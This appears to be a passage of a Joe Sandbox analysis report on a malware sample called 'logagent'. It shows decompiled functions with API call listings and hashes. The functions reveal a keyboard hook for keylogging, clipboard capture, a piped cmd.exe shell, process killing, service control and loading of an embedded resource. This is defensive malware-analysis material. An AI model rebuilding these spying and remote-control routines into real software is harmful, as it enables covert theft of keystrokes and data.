                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
• Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$Open$CloseControlHandleManager
                                  • String ID:
                                  • API String ID: 1243734080-0
                                  • Opcode ID: f8fd2a6c5f299153eb193c66ec477f5c61babc6e911454b5a8d4cefe462bdfda
                                  • Instruction ID: 01ad53eeed1c53c29086dd7888b743c0ac33d0ae929ec59f05dd8de3e33e55d3
                                  • Opcode Fuzzy Hash: f8fd2a6c5f299153eb193c66ec477f5c61babc6e911454b5a8d4cefe462bdfda
                                  • Instruction Fuzzy Hash: 62F04F71510618FFD3106FB4AC88EEF3FACEF89791B448025F90692051DB649D45CAE5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 37%
                                  			E105531E8(void* _a4) {
                                  				struct _SERVICE_STATUS _v32;
                                  				int _t10;
                                  				signed int _t16;
                                  				void* _t19;
                                  				void* _t20;
                                  				intOrPtr* _t21;
                                  
                                  				_t16 = 0;
                                  				_t20 = OpenSCManagerW(0, 0, 0x40);
                                  				_t19 = OpenServiceW(_t20,  *0x41532c(), 0x40);
                                  				if(_t19 != 0) {
                                  					_t10 = ControlService(_t19, 2,  &_v32);
                                  					_t21 =  *0x415068;
                                  					_t16 = 0 | _t10 != 0x00000000;
                                  					 *_t21(_t20);
                                  					 *_t21(_t19);
                                  				} else {
                                  					CloseServiceHandle(_t20);
                                  				}
                                  				 *0x415350();
                                  				return _t16;
                                  			}


                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,0041B310,?,?,?,?,?,?,?,10552B88), ref: 105531F7
                                  • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,10552B88), ref: 1055320C
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,10552B88), ref: 10553219
                                  • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,?,10552B88), ref: 10553228
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
• Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$Open$CloseControlHandleManager
                                  • String ID:
                                  • API String ID: 1243734080-0
                                  • Opcode ID: cb019a389b407e0f39cc257e6cab2f96e1b8a4e5817695bb663befdd35136c94
                                  • Instruction ID: 4e4e0f5da03d1a312dd26725731ec49632a90dbfe484da689e4cb78517a810f1
                                  • Opcode Fuzzy Hash: cb019a389b407e0f39cc257e6cab2f96e1b8a4e5817695bb663befdd35136c94
                                  • Instruction Fuzzy Hash: 8FF04F71500518FFD3106FB5AC89EEF3F6CEF89790F448025FA06A2051DB749D458AE9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 37%
                                  			E1055324F(void* _a4) {
                                  				struct _SERVICE_STATUS _v32;
                                  				int _t10;
                                  				signed int _t16;
                                  				void* _t19;
                                  				void* _t20;
                                  				intOrPtr* _t21;
                                  
                                  				_t16 = 0;
                                  				_t20 = OpenSCManagerW(0, 0, 0x40);
                                  				_t19 = OpenServiceW(_t20,  *0x41532c(), 0x40);
                                  				if(_t19 != 0) {
                                  					_t10 = ControlService(_t19, 3,  &_v32);
                                  					_t21 =  *0x415068;
                                  					_t16 = 0 | _t10 != 0x00000000;
                                  					 *_t21(_t20);
                                  					 *_t21(_t19);
                                  				} else {
                                  					CloseServiceHandle(_t20);
                                  				}
                                  				 *0x415350();
                                  				return _t16;
                                  			}


                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,0041B310,?,?,?,?,?,?,?,10552AF7), ref: 1055325E
                                  • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,10552AF7), ref: 10553273
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,10552AF7), ref: 10553280
                                  • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,?,10552AF7), ref: 1055328F
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
• Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$Open$CloseControlHandleManager
                                  • String ID:
                                  • API String ID: 1243734080-0
                                  • Opcode ID: b8c97e63606c52034d353a1b2137b25ccf4b96d28f39b7d99feda07d95563afa
                                  • Instruction ID: 7b2b6ab69fa5ada3766b2f4828e84ea8f738119679e74e6d2ef979ba74d82d8c
                                  • Opcode Fuzzy Hash: b8c97e63606c52034d353a1b2137b25ccf4b96d28f39b7d99feda07d95563afa
                                  • Instruction Fuzzy Hash: 48F04F71500518FFD3106FB4EC88EEF3F6CEF89691F448125FA06A2051DB749E468AE9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 37%
                                  			E1055308F(void* _a4) {
                                  				int _t8;
                                  				signed int _t14;
                                  				void* _t17;
                                  				void* _t18;
                                  				intOrPtr* _t19;
                                  
                                  				_t14 = 0;
                                  				_t18 = OpenSCManagerW(0, 0, 0x10);
                                  				_t17 = OpenServiceW(_t18,  *0x41532c(), 0x10);
                                  				if(_t17 != 0) {
                                  					_t8 = StartServiceW(_t17, 0, 0);
                                  					_t19 =  *0x415068;
                                  					_t14 = 0 | _t8 != 0x00000000;
                                  					 *_t19(_t18);
                                  					 *_t19(_t17);
                                  				} else {
                                  					CloseServiceHandle(_t18);
                                  				}
                                  				 *0x415350();
                                  				return _t14;
                                  			}


                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,0041B310,?,?,10552C9C), ref: 1055309B
                                  • OpenServiceW.ADVAPI32(00000000,00000000,?,?,10552C9C), ref: 105530B0
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,10552C9C), ref: 105530BD
                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,10552C9C), ref: 105530C8
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
• Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$Open$CloseHandleManagerStart
                                  • String ID:
                                  • API String ID: 2553746010-0
                                  • Opcode ID: 0cc14d108f04878674a6d267668b74455fb6495d903e3efe619db27e090fbd46
                                  • Instruction ID: 43a04c1309c32b1a87a003e115f535fc87dfd98479afb45fd1b81f2c981e4967
                                  • Opcode Fuzzy Hash: 0cc14d108f04878674a6d267668b74455fb6495d903e3efe619db27e090fbd46
                                  • Instruction Fuzzy Hash: 23F06D71100628FFD3106BB5EC8CDEF7FACEF893A4B048425F90993160DB648D459AE5
                                  Uniqueness
                                  • Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004052D5(intOrPtr* __ecx) {
                                  				struct tagMSG _v32;
                                  				intOrPtr* _t14;
                                  
                                  				_t14 = __ecx;
                                  				 *0x41b9a8 = __ecx;
                                  				if( *__ecx != 0) {
                                  					L3:
                                  					if(GetMessageA( &_v32, 0, 0, 0) != 0) {
                                  						TranslateMessage( &_v32);
                                  						DispatchMessageA( &_v32);
                                  						goto L2;
                                  					}
                                  				} else {
                                  					 *_t14 = SetWindowsHookExA(0xd, E004052BA, 0, 0); // 0xd = WH_KEYBOARD_LL: global low-level keyboard hook, callback E004052BA
                                  					L2:
                                  					if( *_t14 != 0) {
                                  						goto L3;
                                  					}
                                  				}
                                  				return 0;
                                  			}

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Message$DispatchHookTranslateWindows
                                  • String ID:
                                  • API String ID: 1978648212-0
                                  • Opcode ID: 52272d776155f8ea9757c9a67d2815f13097f215008760f7cfa802aa42738574
                                  • Instruction ID: 3f8d98675bb246c8319de4d6d7df696f93bc8797274e956dc3fa59b7a05fdffb
                                  • Opcode Fuzzy Hash: 52272d776155f8ea9757c9a67d2815f13097f215008760f7cfa802aa42738574
                                  • Instruction Fuzzy Hash: 5DF03071900A05EBC7205FA6AC0CEDBBBFCEBD5B42B50443EA885E2190E6788441CF68
                                  Uniqueness
                                  • Uniqueness Score: -1.00%

                                  APIs
                                  • OpenProcess.KERNEL32(00000410,00000000,1054B4C8,00415208), ref: 105544ED
                                  • GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 1055450D
                                  • CloseHandle.KERNEL32(00000000), ref: 10554518
                                  • CloseHandle.KERNEL32(00000000), ref: 10554529
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandle$FileModuleNameOpenProcess
                                  • String ID:
                                  • API String ID: 3706008839-0
                                  • Opcode ID: 022d2fd6006c4be54da2a4328dbb8e4cfe22859691548aaa1e3c37b3e0e1552c
                                  • Instruction ID: ab28cffcd80e565fae20a232256bb9ea5d9173a701e6cd5beeadd5fece462388
                                  • Opcode Fuzzy Hash: 022d2fd6006c4be54da2a4328dbb8e4cfe22859691548aaa1e3c37b3e0e1552c
                                  • Instruction Fuzzy Hash: 3CF04F75640619FBDB119F90DC49FDA3FACEB48746F008122F949DA190EF70EA448F94
                                  Uniqueness
                                  • Uniqueness Score: -1.00%

                                  C-Code - Quality: 18%
                                  			E0040B5A2(intOrPtr _a4, void* _a8, short* _a12, char _a15, short* _a16) {
                                  				int _v8;
                                  				char _v2056;
                                  
                                  				_v8 = 0x400;
                                  				if(RegOpenKeyExW(_a8, _a12, 0, 0x20019,  &_a8) != 0) { // 0x20019 = KEY_READ
                                  					_push( &_a15);
                                  					_push(0x415800);
                                  				} else {
                                  					RegQueryValueExW(_a8, _a16, 0, 0,  &_v2056,  &_v8);
                                  					RegCloseKey(_a8);
                                  					_push( &_a15);
                                  					_push( &_v2056);
                                  				}
                                  				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z();
                                  				return _a4;
                                  			}

                                  APIs
                                  • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,80000000), ref: 0040B5C3
                                  • RegQueryValueExW.ADVAPI32(80000000,00412203,00000000,00000000,?,00000400), ref: 0040B5E2
                                  • RegCloseKey.ADVAPI32(80000000), ref: 0040B5EB
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 0040B60A
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$??0?$basic_string@CloseG@1@@G@2@@std@@G@std@@OpenQueryU?$char_traits@Value
                                  • String ID:
                                  • API String ID: 4081865614-0
                                  • Opcode ID: fb7ef9b6539aba75acc45a89fbd2bb87bc1b0fcb06b4154e7f789d8a22b8fd0a
                                  • Instruction ID: 08c4fdd74f089b672de4800a8e1209c34edbbd410ac70e3f0c9e675f1f7a205c
                                  • Opcode Fuzzy Hash: fb7ef9b6539aba75acc45a89fbd2bb87bc1b0fcb06b4154e7f789d8a22b8fd0a
                                  • Instruction Fuzzy Hash: 3D01F67554010EFFDB11DF90ED45FDA7BBCFB08304F508062BA05AA1A0D770AA199B98
                                  Uniqueness
                                  • Uniqueness Score: -1.00%

                                  C-Code - Quality: 37%
                                  			E0040D87E() {
                                  				char _t9;
                                  				void* _t22;
                                  				void* _t28;
                                  				intOrPtr _t29;
                                  
                                  				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E0040180C(_t22 - 0x10, _t28, 1));
                                  				_t29 =  *0x41b889; // 0x0
                                  				if(_t29 == 0) {
                                  					_t9 = E0040180C(_t22 - 0x10, _t29, 0);
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                  					E00402B8A(_t9);
                                  				}
                                  				E004017DD(_t22 - 0x10);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return 0;
                                  			}

                                  APIs
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000001), ref: 0040D88E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D8B1
                                    • Part of subcall function 00402B8A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00402BDC
                                    • Part of subcall function 00402B8A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00402BFB
                                    • Part of subcall function 00402B8A: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B860,cmd.exe), ref: 00402C1F
                                    • Part of subcall function 00402B8A: getenv.MSVCRT ref: 00402C34
                                    • Part of subcall function 00402B8A: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00402C3E
                                    • Part of subcall function 00402B8A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415774), ref: 00402C4B
                                    • Part of subcall function 00402B8A: CreatePipe.KERNEL32(0041B7A0,0041B870,0041B7F0,00000000), ref: 00402C81
                                    • Part of subcall function 00402B8A: CreatePipe.KERNEL32(0041B858,0041B874,0041B7F0,00000000), ref: 00402C9B
                                    • Part of subcall function 00402B8A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041B7A8,0041B878), ref: 00402CF2
                                    • Part of subcall function 00402B8A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000001,00000000,00000000,00000000), ref: 00402D06
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@V01@$??1?$basic_string@??4?$basic_string@?c_str@?$basic_string@CreateD@1@@PipeV01@@$??8std@@D@2@@0@V?$basic_string@Y?$basic_string@getenv
                                  • String ID:
                                  • API String ID: 187635395-0
                                  • Opcode ID: 450a3559cbae69685aa4108714fcfe19e1a758c696523a106c3012aef2761bb0
                                  • Instruction ID: 95a58a3f9309c0e5762bae13ef1d8417c4b6d23d487987f94e594afc93633c1a
                                  • Opcode Fuzzy Hash: 450a3559cbae69685aa4108714fcfe19e1a758c696523a106c3012aef2761bb0
                                  • Instruction Fuzzy Hash: 22F03A7191011CCBD704BBA6ECA99EE7B34EB64355B404C3BE412A20E1EBB90525CA5D
                                  Uniqueness
                                  • Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040969A,?,?), ref: 0041359B
                                    • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                    • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                    • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                    • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                    • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,0040969A,?,?), ref: 004135B2
                                    • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135CA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135D3
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$?begin@?$basic_string@G@1@@$?c_str@?$basic_string@?end@?$basic_string@?length@?$basic_string@D@1@@V01@@
                                  • String ID:
                                  • API String ID: 384503197-0
                                  • Opcode ID: fc84d7bb029b3800a199890aa7fda8e35941668a1b6b46af4e7b1dfef16bc2af
                                  • Instruction ID: e9850064b0a36303cd24c251ff0e0265422eee26172e2298965a0cd1febf68d2
                                  • Opcode Fuzzy Hash: fc84d7bb029b3800a199890aa7fda8e35941668a1b6b46af4e7b1dfef16bc2af
                                  • Instruction Fuzzy Hash: 30F0DA7141021EEBCF04EFA0EC49CEE7779FB48254B444429F926D20A0EB75A659CB94
                                  Uniqueness
                                  • Uniqueness Score: -1.00%

                                  C-Code - Quality: 27%
                                  			E00406BEF(void* __ecx, intOrPtr _a4) {
                                  				char _v5;
                                  				void* _t15;
                                  
                                  				if(OpenClipboard(0) == 0) {
                                  					L3:
                                  					_push( &_v5);
                                  					_push(0x415664);
                                  				} else {
                                  					_t15 = GetClipboardData(1); // 1 = CF_TEXT: reads the clipboard as ANSI text
                                  					CloseClipboard();
                                  					if(_t15 == 0) {
                                  						goto L3;
                                  					} else {
                                  						_push( &_v5);
                                  						_push(_t15);
                                  					}
                                  				}
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
                                  				return _a4;
                                  			}

                                  APIs
                                  • OpenClipboard.USER32(00000000), ref: 00406BF6
                                  • GetClipboardData.USER32 ref: 00406C02
                                  • CloseClipboard.USER32 ref: 00406C0A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?,?,00406C77,?,?,00000000,00000000,?,?,?,?,?,00405AF6), ref: 00406C27
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Clipboard$V?$allocator@$??0?$basic_string@CloseD@1@@D@2@@std@@D@std@@DataOpenU?$char_traits@
                                  • String ID:
                                  • API String ID: 1727351239-0
                                  • Opcode ID: d31ff5e3c6f90f495a0499d15105459c1e1ba467a64aad7b936036200359d4d3
                                  • Instruction ID: d068d5d9f876e73b388ef04ee2f39e673df6a44b067aa838ba22f5a803aba3f5
                                  • Opcode Fuzzy Hash: d31ff5e3c6f90f495a0499d15105459c1e1ba467a64aad7b936036200359d4d3
                                  • Instruction Fuzzy Hash: 05E03075504615EFE7409B50DC49FDA7BACDB85B52F408035B90ADA280D7749980CAA8
                                  Uniqueness
                                  • Uniqueness Score: -1.00%

                                  APIs
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 004054FC
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 0040550F
                                  • SetEvent.KERNEL32(?,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405518
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405527
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@V01@@Y?$basic_string@$??1?$basic_string@Event
                                  • String ID:
                                  • API String ID: 3911305588-0
                                  • Opcode ID: 5e8272a8b6e28889ab6d8654449965f19fbf5b6a96bc948a22fd1af30fd28282
                                  • Instruction ID: de7088bd0e13ff88ad3ed09bf1a5158b73f18205d37a60fa436fa72f9884fc0a
                                  • Opcode Fuzzy Hash: 5e8272a8b6e28889ab6d8654449965f19fbf5b6a96bc948a22fd1af30fd28282
                                  • Instruction Fuzzy Hash: 06F08231400B49EFCB11DF60D848AD77FA8EF05244F448469E48382961D774F588CF98
                                  Uniqueness
                                  • Uniqueness Score: -1.00%

                                  C-Code - Quality: 46%
                                  			E0040D7C0(void* __eflags) {
                                  				char* _t5;
                                  				void* _t20;
                                  
                                  				_t5 = E0040180C(_t20 - 0x10, __eflags, 0);
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				E004126BC(atoi(_t5));
                                  				E004017DD(_t20 - 0x10);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return 0;
                                  			}

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040D7CC
                                  • atoi.MSVCRT ref: 0040D7D3
                                    • Part of subcall function 004126BC: OpenProcess.KERNEL32(00000001,00000000,?), ref: 004126C9
                                    • Part of subcall function 004126BC: TerminateProcess.KERNEL32(00000000,00000000), ref: 004126D7
                                    • Part of subcall function 004126BC: CloseHandle.KERNEL32(00000000), ref: 004126E3
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@Process$?c_str@?$basic_string@CloseHandleOpenTerminateatoi
                                  • String ID:
                                  • API String ID: 1377568529-0
                                  • Opcode ID: 564291607d9638d041430aad6149658f0cca5fd975ad9575967f8846513cae85
                                  • Instruction ID: 2746f951d2caaa68166efb6d96d37f5946b4e222a380c15f16ac4a6add4f85c7
                                  • Opcode Fuzzy Hash: 564291607d9638d041430aad6149658f0cca5fd975ad9575967f8846513cae85
                                  • Instruction Fuzzy Hash: 54E0ED72914519CBCB04ABE1EC599ED7324EB90316F50483FE112E60E1EE785555CB1C
                                  Uniqueness
                                  • Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E1054B691(void** _a4) {
                                  				void* _t4;
                                  				long _t5;
                                  				struct HRSRC__* _t7;
                                  
                                  				_t7 = FindResourceA(0, 0x4166b8, 0xa); // type 0xa = RT_RCDATA: raw data resource in the calling module
                                  				_t4 = LockResource(LoadResource(0, _t7));
                                  				_t5 = SizeofResource(0, _t7);
                                  				 *_a4 = _t4;
                                  				return _t5;
                                  			}

                                  APIs
                                  • FindResourceA.KERNEL32(00000000,004166B8,0000000A), ref: 1054B69F
                                  • LoadResource.KERNEL32(00000000,00000000,?,?,?,1054B1CB,00000000), ref: 1054B6AA
                                  • LockResource.KERNEL32(00000000,?,?,?,1054B1CB,00000000), ref: 1054B6B1
                                  • SizeofResource.KERNEL32(00000000,00000000,?,?,?,1054B1CB,00000000), ref: 1054B6BC
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Resource$FindLoadLockSizeof
                                  • String ID:
                                  • API String ID: 3473537107-0
                                  • Opcode ID: 48e65bcaf9e34f3bd4814d5b8f3278eefd50652902c2b44e954c88ebdafe90fb
                                  • Instruction ID: dff85c0b1422ab4955d2beb391fe13d27272d16ce83a247481c219f138c774b2
                                  • Opcode Fuzzy Hash: 48e65bcaf9e34f3bd4814d5b8f3278eefd50652902c2b44e954c88ebdafe90fb
                                  • Instruction Fuzzy Hash: 27E09A31641714EBD6101BE5AC0DFDA7E78EBCAB63F0140A5FA098B1D0C561440086A9
                                  Uniqueness
